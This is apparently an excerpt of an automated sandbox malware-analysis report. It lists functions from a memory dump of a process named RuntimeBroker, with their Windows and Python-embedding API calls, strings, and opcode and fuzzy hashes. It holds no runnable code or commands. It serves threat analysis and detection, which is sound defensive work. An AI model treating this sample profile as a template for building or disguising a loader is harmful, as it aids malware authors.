Instruction Fuzzy Hash: 2B01A521B0874641E925BB5A5D4006DE695FB59FE0F888635DE5C13BEADE3CE4028B10

Function 00007FF72B06720C Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06724A

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 93cc75e73fc731150685ac81897151a46a4fbf68a2222c5b0bedab5563f2a346
Instruction ID: f4c8b12168d1a1072e5696e60f7680a53d71fdd8bf2954667ba4f05d6b13e862
Opcode Fuzzy Hash: 93cc75e73fc731150685ac81897151a46a4fbf68a2222c5b0bedab5563f2a346
Instruction Fuzzy Hash: 5A013930F1968341FEB6BF696D412799290EF497A4F98023CFE5C426E6DE2CB4404A21

Function 00007FF72B06DEA8 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF72B06A63A,?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A), ref: 00007FF72B06DEFD

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
Instruction ID: deaaa198a8064f2fd00b11cf8f549a3a9c26fb4ea2bc869ff8001a871efc65d3
Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
Instruction Fuzzy Hash: 92F04F50F0964781FE76776B5C612B5D290EF5CB40FC84138D90E862A2DD1CE4854A30

Function 00007FF72B06C90C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF72B05FFB0,?,?,?,00007FF72B06161A,?,?,?,?,?,00007FF72B062E09), ref: 00007FF72B06C94A

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction ID: c3c0ce42795c7bc4807a1bd7a02b326b8fa82869ddcfb66acacd385049474d89
Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction Fuzzy Hash: 5CF05E00F1924745FF77777A5C59279D180DF4CB60FC842389D2E452E1DE1CE5418930

Function 00007FF72B067548 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B067561

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
Instruction ID: 3fd0cfbda46e0f783641dffedaf93fafc55f8bc4e6317469eda663d7bd670a72
Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
Instruction Fuzzy Hash: 17E0B6A0F4824642FA7A7FAC4E822799110EF6C340FC45078DE18062A7DD5C78489A32

Non-executed Functions

Function 00007FF72B0550B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B0550C0
GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B055101
GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B055126
GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B05514B
GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B055173
GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B05519B
GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B0551C3
GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B0551EB
GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B055213

Strings

PyErr_Restore, xrefs: 00007FF72B055399, 00007FF72B0553B5
PyErr_Fetch, xrefs: 00007FF72B0552F9, 00007FF72B055315
PySys_SetObject, xrefs: 00007FF72B055669, 00007FF72B055685
PyConfig_Clear, xrefs: 00007FF72B0551E1, 00007FF72B0551FD
PyImport_ExecCodeModule, xrefs: 00007FF72B055411, 00007FF72B05542D
Py_Finalize, xrefs: 00007FF72B055141, 00007FF72B05515D
PySys_GetObject, xrefs: 00007FF72B055641, 00007FF72B05565D
PyRun_SimpleStringFlags, xrefs: 00007FF72B0555F1, 00007FF72B05560D
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF72B0555C9, 00007FF72B0555E5
PyModule_GetDict, xrefs: 00007FF72B0554D9, 00007FF72B0554F5
PyStatus_Exception, xrefs: 00007FF72B055619, 00007FF72B055635
Py_DecodeLocale, xrefs: 00007FF72B0550F7, 00007FF72B055113
PyUnicode_Replace, xrefs: 00007FF72B055781, 00007FF72B05579D
PyConfig_Read, xrefs: 00007FF72B055231, 00007FF72B05524D
PyConfig_SetWideStringList, xrefs: 00007FF72B0552A9, 00007FF72B0552C5
GetProcAddress, xrefs: 00007FF72B0550E0
PyUnicode_FromString, xrefs: 00007FF72B055731, 00007FF72B05574D
PyConfig_InitIsolatedConfig, xrefs: 00007FF72B055209, 00007FF72B055225
PyConfig_SetString, xrefs: 00007FF72B055281, 00007FF72B05529D
PyObject_CallFunction, xrefs: 00007FF72B055501, 00007FF72B05551D
Py_DecRef, xrefs: 00007FF72B0550B6, 00007FF72B0550D2
PyUnicode_FromFormat, xrefs: 00007FF72B055709, 00007FF72B055725
PyErr_Clear, xrefs: 00007FF72B0552D1, 00007FF72B0552ED
PyUnicode_Decode, xrefs: 00007FF72B0556B9, 00007FF72B0556D5
PyConfig_SetBytesString, xrefs: 00007FF72B055259, 00007FF72B055275
PyErr_Occurred, xrefs: 00007FF72B055349, 00007FF72B055365
Py_PreInitialize, xrefs: 00007FF72B0551B9, 00007FF72B0551D5
PyImport_ImportModule, xrefs: 00007FF72B055439, 00007FF72B055455
PyImport_AddModule, xrefs: 00007FF72B0553E9, 00007FF72B055405
PyObject_Str, xrefs: 00007FF72B0555A1, 00007FF72B0555BD
PyUnicode_DecodeFSDefault, xrefs: 00007FF72B0556E1, 00007FF72B0556FD
PyObject_GetAttrString, xrefs: 00007FF72B055551, 00007FF72B05556D
PyErr_NormalizeException, xrefs: 00007FF72B055321, 00007FF72B05533D
PyMarshal_ReadObjectFromString, xrefs: 00007FF72B055489, 00007FF72B0554A5
PyEval_EvalCode, xrefs: 00007FF72B0553C1, 00007FF72B0553DD
PyUnicode_Join, xrefs: 00007FF72B055759, 00007FF72B055775
PyMem_RawFree, xrefs: 00007FF72B0554B1, 00007FF72B0554CD
PyErr_Print, xrefs: 00007FF72B055371, 00007FF72B05538D
PyUnicode_AsUTF8, xrefs: 00007FF72B055691, 00007FF72B0556AD
Py_ExitStatusException, xrefs: 00007FF72B05511C, 00007FF72B055138
Py_InitializeFromConfig, xrefs: 00007FF72B055169, 00007FF72B055185
Py_IsInitialized, xrefs: 00007FF72B055191, 00007FF72B0551AD
PyObject_SetAttrString, xrefs: 00007FF72B055579, 00007FF72B055595
PyObject_CallFunctionObjArgs, xrefs: 00007FF72B055529, 00007FF72B055545
PyList_Append, xrefs: 00007FF72B055461, 00007FF72B05547D
Failed to get address for %hs, xrefs: 00007FF72B0550D9

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-2007157414
Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction ID: 66a1498f64d863b07e96b0759cf09460149afc660524153ff3ede2eb42c74d45
Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction Fuzzy Hash: 7B124764A0AB4391FA77FB5CACA42B8E3A0FF04751BD45435C41E126B1EF7CE548AB60

Function 00007FF72B0733BC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF72B07340A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B073A76
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B073BEC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B073EAA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0740CA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B074307
memcpy_s.LIBCPMT ref: 00007FF72B0743E2
memcpy_s.LIBCPMT ref: 00007FF72B07448D
memcpy_s.LIBCPMT ref: 00007FF72B07455C

Strings

1#SNAN, xrefs: 00007FF72B07351A
1#IND, xrefs: 00007FF72B0734F7
1#QNAN, xrefs: 00007FF72B073523
1#INF, xrefs: 00007FF72B073533

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
Instruction ID: 4c6eb8f0ead000ee62e9b50f1e18363c9092519c2012df3866164e09182fbb9c
Opcode Fuzzy Hash: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
Instruction Fuzzy Hash: 01B2D172E182828BF7369F6CD8407FDE7A1FB54388F849135DA0957AA4DB38A901DF50

Function 00007FF72B059FCD Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

too many length or distance symbols, xrefs: 00007FF72B05A166
invalid code lengths set, xrefs: 00007FF72B05A14D
invalid distance code, xrefs: 00007FF72B05A8D4
invalid literal/lengths set, xrefs: 00007FF72B05A453
invalid distance too far back, xrefs: 00007FF72B05A990
invalid distances set, xrefs: 00007FF72B05A4C0
invalid bit length repeat, xrefs: 00007FF72B05A3B9
invalid code -- missing end-of-block, xrefs: 00007FF72B05A3E6
invalid literal/length code, xrefs: 00007FF72B05A702

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
Instruction ID: 3428f7d05512598468881fe2741ee47eaa2d4c718b53a391806dacc461bf8f27
Opcode Fuzzy Hash: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
Instruction Fuzzy Hash: 33521872A146A58BD7A59F19C898B7E7BEDFB44340F814139E65A83B90DB3CE844CF10

Function 00007FF72B05C44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF72B05C468
RtlCaptureContext.KERNEL32 ref: 00007FF72B05C495
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF72B05C4AF
RtlVirtualUnwind.KERNEL32 ref: 00007FF72B05C4F0
IsDebuggerPresent.KERNEL32 ref: 00007FF72B05C544
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF72B05C561
UnhandledExceptionFilter.KERNEL32 ref: 00007FF72B05C56C

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction ID: a21a696c6b090491c6629d0cf89f837637f4ab48af9e5dd4ea38f3ac7b0fc683
Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction Fuzzy Hash: 15311F72609A8185EB719F64E8907FDB364FB44744F844039DA4D47BA5DF38D549CB20

Function 00007FF72B0529E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF72B05342E,?,00007FF72B053534), ref: 00007FF72B052A14
FormatMessageW.KERNEL32(?,?,?,00007FF72B05342E), ref: 00007FF72B052A7D
MessageBoxW.USER32 ref: 00007FF72B052ACF

Strings

Error, xrefs: 00007FF72B052ABE
%ls%ls: %ls, xrefs: 00007FF72B052A96
<FormatMessageW failed.>, xrefs: 00007FF72B052A83

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Message$ErrorFormatLast
String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
API String ID: 3971115935-1149178304
Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
Instruction ID: 4e961df43b03e01fffc5692f8d0dcd4e38debf4df37a838c4ccefed7076a9077
Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
Instruction Fuzzy Hash: 9D212372618A8582E731AB14F8546EAF364FB88784F804136EBCD53AA8DF7CD545CF50

Function 00007FF72B074F10 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF72B074F55

Part of subcall function 00007FF72B0748A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0748BC

Part of subcall function 00007FF72B069C58: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C6E
Part of subcall function 00007FF72B069C58: GetLastError.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C78

Part of subcall function 00007FF72B069C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF72B069BEF,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B069C19
Part of subcall function 00007FF72B069C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF72B069BEF,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B069C3E

_get_daylight.LIBCMT ref: 00007FF72B074F44

Part of subcall function 00007FF72B074908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B07491C

_get_daylight.LIBCMT ref: 00007FF72B0751BA
_get_daylight.LIBCMT ref: 00007FF72B0751CB
_get_daylight.LIBCMT ref: 00007FF72B0751DC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72B07541C), ref: 00007FF72B075203

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$BoundaryCurrentDeleteDescriptorErrorFeatureInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 3714727158-0
Opcode ID: ec3da476d7abf2ffb0f6397319154e28f094a84f5b0708b50d9998a811af1003
Instruction ID: b8c2b5f65684857ba03b04b6275a3d6c74fc9a2e05f0d884f64d1be082add1f6
Opcode Fuzzy Hash: ec3da476d7abf2ffb0f6397319154e28f094a84f5b0708b50d9998a811af1003
Instruction Fuzzy Hash: AED1A026E1864286E736BF2ADC501BDE3A1FF49B84FC48135DA0D476A6DE3CE441DB60

Function 00007FF72B069924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF72B06999D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF72B0699B5
RtlVirtualUnwind.KERNEL32 ref: 00007FF72B0699F0
IsDebuggerPresent.KERNEL32 ref: 00007FF72B069A29
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF72B069A33
UnhandledExceptionFilter.KERNEL32 ref: 00007FF72B069A3E

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction ID: b3aaac424866fe1e4481d4fbc1dcf890b6384a01501259f7aaf1401a69bdb282
Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction Fuzzy Hash: B1315E32A18B8185DB759F29E8802BEB3A4FB88754F940135EA9D43B65DF38D146CB10

Function 00007FF72B070B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B070BD0
FindFirstFileExW.KERNEL32 ref: 00007FF72B070CDA

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 537ca4dcf685df196dbb745ebf7a8e3eb288cf6b089b90446fc853c3fde494ee
Instruction ID: 6c269aeb70abeba5c8fdd8854abd405dc6f7c3fa2a5a475cc835093ee82fc2f6
Opcode Fuzzy Hash: 537ca4dcf685df196dbb745ebf7a8e3eb288cf6b089b90446fc853c3fde494ee
Instruction Fuzzy Hash: 34B1E861B1868241EA72AB29DC049B9E350EB44BE4FC45231EE5E47BE5EF3CE441DB10

Function 00007FF72B07518C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF72B0751BA

Part of subcall function 00007FF72B074908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B07491C

_get_daylight.LIBCMT ref: 00007FF72B0751CB

Part of subcall function 00007FF72B0748A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0748BC

_get_daylight.LIBCMT ref: 00007FF72B0751DC

Part of subcall function 00007FF72B0748D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0748EC

Part of subcall function 00007FF72B069C58: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C6E
Part of subcall function 00007FF72B069C58: GetLastError.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C78

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72B07541C), ref: 00007FF72B075203

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$BoundaryDeleteDescriptorErrorInformationLastTimeZone
String ID:
